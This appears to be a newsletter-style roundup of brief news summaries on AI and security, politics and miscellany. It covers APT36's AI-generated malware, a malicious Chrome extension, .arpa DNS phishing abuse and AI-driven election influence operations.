AI
Pakistan's main APT group has switched from off-the-shelf low quality malware tools to vibe-coded custom malware
Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control. Identified victims were infected with multiple, parallel implants, each using a different language and communication protocol.
AI as tradecraft: How threat actors operationalize AI | Microsoft Security Blog
Threat actors use generative AI to draft phishing lures, translate content, summarize stolen data, generate or debug malware, and scaffold scripts or infrastructure. For these uses, AI functions as a force multiplier that reduces technical friction and accelerates execution, while human operators retain control over objectives, targeting, and deployment decisions.
Microsoft Threat Intelligence has observed early threat actor experimentation with agentic AI, where models support iterative decision‑making and task execution.
Anthropic’s AI Hacked the Firefox Browser. It Found a Lot of Bugs.
Over a two-week period in January, Claude Opus 4.6 found more high-severity bugs in Firefox than the rest of the world typically reports in two months, Mozilla said.
Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware
The threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool. The researchers say that "just hosting the malware on GitHub was enough to poison Bing AI search results."
Deepfakes, Noise, and Doubt: AI's Role in Three Recent Elections
In the span of six weeks, Graphika monitored influence operations targeting elections in Bangladesh, Colombia, and Tibet.
Election interference operations combine AI-generated content with automated distribution, utilizing coordinated inauthentic accounts to simulate organic reach.
Narratives are increasingly shifting toward delegitimizing the electoral process and institutions in addition to candidate attacks.
Generative AI makes it easier for state-linked actors to produce high-volume, bilingual content tailored to local political contexts.
Politics
EU court adviser says banks must immediately refund phishing victims
he case involved phishing fraud, where the customer advertised an item for sale on an auction platform, and was approached by a fraudster who sent them a malicious link to a page resembling the bank’s login interface.
The customer entered their bank account credentials on that site, which the fraudster then used to execute an unauthorized payment.
Athanasios Rantos, the Advocate General of the Court of Justice of the EU (CJEU), has issued a formal opinion suggesting that banks must immediately refund account holders affected by unauthorized transactions, even when it's their fault.
DHS Wants to Build a System to Surveil Americans’ Travel Records
DHS outlines the specifics they envision: a program that would provide real-time or near-real time access to a range of personal travel data, including passenger names, origins and destinations, flight numbers, ticket numbers, and forms of payment. The data would be gleaned from third-party ticketing sites, such as Orbitz or Expedia, and must cover major US and international airlines.
This study might make you stop drinking bottled water forever
People swallow between 39,000 and 52,000 microplastic particles every year. Bottled water drinkers add roughly 90,000 more. Research links this to chronic inflammation, hormonal disruption, oxidative stress, neurological problems, even cancer.
Fishing crews in the Atlantic keep accidentally dredging up chemical weapons
There were at least three incidents of commercial fishing crews dredging up dangerous chemical warfare munitions (CWMs) off the coast of New Jersey between 2016 and 2023.
The three incidents exposed at least six crew members to mustard agent, which causes blistering chemical burns on skin and mucous membranes.
Girl Scouts highly unimpressed after New Jersey troop teams up with local cannabis dispensary to sell cookies
Set up near Daylite Dispensary in Mount Laurel last month, the troop’s booth offered the full line-up of treats. Dispensary owner Steve Cassidy said the partnership was a massive success and drew people both to the booth and the cannabis shop.
Pentagon taps controversial DOGE employee to lead its AI efforts amid Anthropic fallout
He reposted content from figures such as white supremacist Nick Fuentes and self-described misogynist Andrew Tate. .
From Iran to Ukraine, everyone’s trying to hack security cameras
Tel Aviv–based security firm Check Point released new research describing hundreds of hacking attempts that targeted consumer-grade security cameras around the Middle East—with many apparently timed to Iran’s recent missile and drone strikes on targets that included Israel, Qatar, and Cyprus. Those camera-hijacking efforts, some of which Check Point has attributed to a hacker group that’s been previously linked to Iranian intelligence, suggest that Iran’s military has tried to use civilian surveillance cameras as a means to spot targets, plan strikes, or assess damage from its attacks,
Breaking Down The Tech ICE Uses To Spy On You -- YouTube
A good video summarizing the situation, from facial recognition to evading encryption.
Infosec
From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain
A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data.
Hackers abuse .arpa DNS and ipv6 to evade phishing defenses
In normal DNS functionality, reverse DNS domains are used for PTR records, which allow systems to determine the hostname associated with a queried IP address.
However, attackers discovered that once they gained control over the DNS zone for an IPv6 range, some DNS management platforms allowed them to configure other record types that can be abused for phishing attacks.
enject: Hide .env secrets from prAIng eyes: secrets live in local encrypted stores (per project) and are injected directly into apps at runtime, never touching disk as plaintext
Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition
|